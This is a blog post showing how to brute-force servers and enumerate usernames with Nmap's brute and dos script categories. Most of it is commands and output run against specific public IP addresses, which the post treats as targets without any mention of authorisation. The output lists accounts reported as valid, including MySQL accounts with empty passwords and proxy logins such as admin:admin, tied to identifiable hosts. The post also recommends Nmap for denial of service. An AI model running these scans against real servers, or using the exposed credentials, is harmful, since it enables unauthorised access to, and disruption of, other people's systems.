Posted: . At: 3:06 PM. This was 4 months ago. Post ID: 19026
Page permalink. WordPress uses cookies, or tiny pieces of information stored on your computer, to verify who you are. There are cookies for logged in users and for commenters.
These cookies expire two weeks after they are set.


How to brute force a server and discover valid credentials like usernames.

by

Using Nmap to brute force a server is a valid technique to get information about a remote server. The below example shows a scan on a remote server. I have managed to get a list of valid usernames from the remote server. The MySQL server is exposed to the Internet and this means I could get a list of valid server usernames. The ‘test’ account is in the database as well. This should not be the case at all.

Bash
╭──(john㉿DESKTOP-PF01IEE)───╮
╰───────────────────────────╾╯(~/Documents)-(172.18.27.171)┋ sudo nmap -A -sS 194.169.211.83 -script brute
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-11 11:05 AEDT
Nmap scan report for 194.169.211.83
Host is up (0.31s latency).
Not shown: 816 filtered tcp ports (no-response), 181 closed tcp ports (reset)
PORT     STATE SERVICE        VERSION
21/tcp   open  ftp            ProFTPD or KnFTPD
| ftp-brute: 
|   Accounts: No valid accounts found
|_  Statistics: Performed 8131 guesses in 601 seconds, average tps: 13.3
3306/tcp open  mysql          MySQL 5.5.5-10.4.29-MariaDB-1:10.4.29+maria~ubu2004
| mysql-brute: 
|   Accounts: No valid accounts found
|   Statistics: Performed 0 guesses in 1 seconds, average tps: 0.0
|_  ERROR: The service seems to have failed or is heavily firewalled...
| mysql-enum: 
|   Valid usernames: 
|     root:<empty> - Valid credentials
|     netadmin:<empty> - Valid credentials
|     guest:<empty> - Valid credentials
|     user:<empty> - Valid credentials
|     web:<empty> - Valid credentials
|     sysadmin:<empty> - Valid credentials
|     administrator:<empty> - Valid credentials
|     webadmin:<empty> - Valid credentials
|     admin:<empty> - Valid credentials
|     test:<empty> - Valid credentials
|_  Statistics: Performed 10 guesses in 2 seconds, average tps: 5.0
8443/tcp open  ssl/http-proxy (bad gateway)
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 502 Bad Gateway
|     Date: Thu, 11 Jan 2024 00:06:27 GMT
|     Content-Length: 0
|   GenericLines, Help, NessusTPv10, RTSPRequest, SSLSessionReq, Socks5: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 502 Bad Gateway
|     Date: Thu, 11 Jan 2024 00:06:25 GMT
|     Content-Length: 0
|   HTTPOptions: 
|     HTTP/1.0 502 Bad Gateway
|     Date: Thu, 11 Jan 2024 00:06:26 GMT
|_    Content-Length: 0
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8443-TCP:V=7.94SVN%T=SSL%I=7%D=1/11%Time=659F3101%P=x86_64-pc-linux
SF:-gnu%r(GetRequest,54,"HTTP/1\.0\x20502\x20Bad\x20Gateway\r\nDate:\x20Th
SF:u,\x2011\x20Jan\x202024\x2000:06:25\x20GMT\r\nContent-Length:\x200\r\n\
SF:r\n")%r(HTTPOptions,54,"HTTP/1\.0\x20502\x20Bad\x20Gateway\r\nDate:\x20
SF:Thu,\x2011\x20Jan\x202024\x2000:06:26\x20GMT\r\nContent-Length:\x200\r\
SF:n\r\n")%r(FourOhFourRequest,54,"HTTP/1\.0\x20502\x20Bad\x20Gateway\r\nD
SF:ate:\x20Thu,\x2011\x20Jan\x202024\x2000:06:27\x20GMT\r\nContent-Length:
SF:\x200\r\n\r\n")%r(GenericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r
SF:\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close
SF:\r\n\r\n400\x20Bad\x20Request")%r(RTSPRequest,67,"HTTP/1\.1\x20400\x20B
SF:ad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConne
SF:ction:\x20close\r\n\r\n400\x20Bad\x20Request")%r(Help,67,"HTTP/1\.1\x20
SF:400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\
SF:r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(SSLSessionReq,
SF:67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\
SF:x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")
SF:%r(NessusTPv10,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\
SF:x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20B
SF:ad\x20Request")%r(Socks5,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nCont
SF:ent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r
SF:\n400\x20Bad\x20Request");
Aggressive OS guesses: Linux 5.0 (92%), Linux 5.0 - 5.4 (92%), HP P2000 G3 NAS device (90%), Linux 4.15 - 5.8 (90%), Linux 5.3 - 5.4 (90%), Linux 2.6.32 (89%), Linux 2.6.32 - 3.1 (89%), Ubiquiti AirMax NanoStation WAP (Linux 2.6.32) (89%), Linux 3.7 (89%), Linux 5.0 - 5.5 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 15 hops
Service Info: OS: Unix

This goes to show a server administrator really should check the security before it goes live on the Internet. The SSH brute force option will not work if the SSH configuration is not using password authentication.

Bash
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
|_ssh-brute: Password authentication not allowed

But the –script brute option for Nmap is a good way to enumerate usernames on a remote server. It works for MySQL and it would work for SSH as well. So this is a neat way to gain more information about remote servers.

It is also possible to perform a DDOS using the Nmap utility, this can be useful also.

Bash
╭──(john㉿DESKTOP-PF01IEE)───╮
╰───────────────────────────╾╯(~/Documents)-(172.18.27.171)┋ sudo nmap -A -sS 85.190.158.85 -script dos
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-11 13:23 AEDT
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).

This is another example, this is very useful for brute-forcing the credentials on a server.

Bash
┏jcartwright@jcartwright-System-Version╼╸╸╸╸╸╸╾
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━◉:~$ sudo nmap -A -sS 46.8.57.209 -P0 -script brute
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-11 14:59 AEDT
Nmap scan report for 46.8.57.209
Host is up (0.34s latency).
Not shown: 560 filtered tcp ports (no-response), 430 closed tcp ports (reset)
PORT     STATE SERVICE     VERSION
1050/tcp open  http-proxy  3Proxy http proxy
| http-proxy-brute: 
|   Accounts: 
|     root:root - Valid credentials
|     netadmin:netadmin - Valid credentials
|     user:user - Valid credentials
|     web:web - Valid credentials
|     guest:guest - Valid credentials
|     sysadmin:sysadmin - Valid credentials
|     administrator:administrator - Valid credentials
|     webadmin:webadmin - Valid credentials
|     admin:admin - Valid credentials
|     test:test - Valid credentials
|_  Statistics: Performed 30 guesses in 5 seconds, average tps: 6.0
1051/tcp open  socks-proxy Socks4A
2200/tcp open  http-proxy  3Proxy http proxy
3000/tcp open  http-proxy  3Proxy http proxy
| http-proxy-brute: 
|   Accounts: No valid accounts found
|   Statistics: Performed 0 guesses in 1 seconds, average tps: 0.0
|_  ERROR: The service seems to have failed or is heavily firewalled...
3001/tcp open  socks-proxy Socks4A
5500/tcp open  http-proxy  3Proxy http proxy
8000/tcp open  http-proxy  3Proxy http proxy
8001/tcp open  socks-proxy Socks4A
9100/tcp open  jetdirect?
9101/tcp open  jetdirect?
3 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port1051-TCP:V=7.94SVN%I=7%D=1/11%Time=659F67AF%P=x86_64-pc-linux-gnu%r
SF:(NULL,8,"\0\[\0\0\0\0\0\0");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port3001-TCP:V=7.94SVN%I=7%D=1/11%Time=659F67AF%P=x86_64-pc-linux-gnu%r
SF:(NULL,8,"\0\[\0\0\0\0\0\0");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port8001-TCP:V=7.94SVN%I=7%D=1/11%Time=659F67AF%P=x86_64-pc-linux-gnu%r
SF:(NULL,8,"\0\[\0\0\0\0\0\0");
Device type: general purpose|storage-misc|WAP
Running (JUST GUESSING): Linux 5.X|4.X|2.6.X|3.X (89%), HP embedded (85%), Ubiquiti embedded (85%), Ubiquiti AirOS 5.X (85%)
OS CPE: cpe:/o:linux:linux_kernel:5.0 cpe:/o:linux:linux_kernel:4 cpe:/h:hp:p2000_g3 cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3 cpe:/h:ubnt:airmax_nanostation cpe:/o:ubnt:airos:5.5.9
Aggressive OS guesses: Linux 5.0 (89%), Linux 5.0 - 5.4 (89%), Linux 4.15 - 5.8 (86%), HP P2000 G3 NAS device (85%), Linux 5.3 - 5.4 (85%), Linux 2.6.32 (85%), Linux 2.6.32 - 3.1 (85%), Ubiquiti AirMax NanoStation WAP (Linux 2.6.32) (85%), Linux 3.7 (85%), Linux 5.0 - 5.5 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 15 hops

This provides invaluable information for a penetration tester.


Leave a Comment

This site uses Akismet to reduce spam. Learn how your comment data is processed.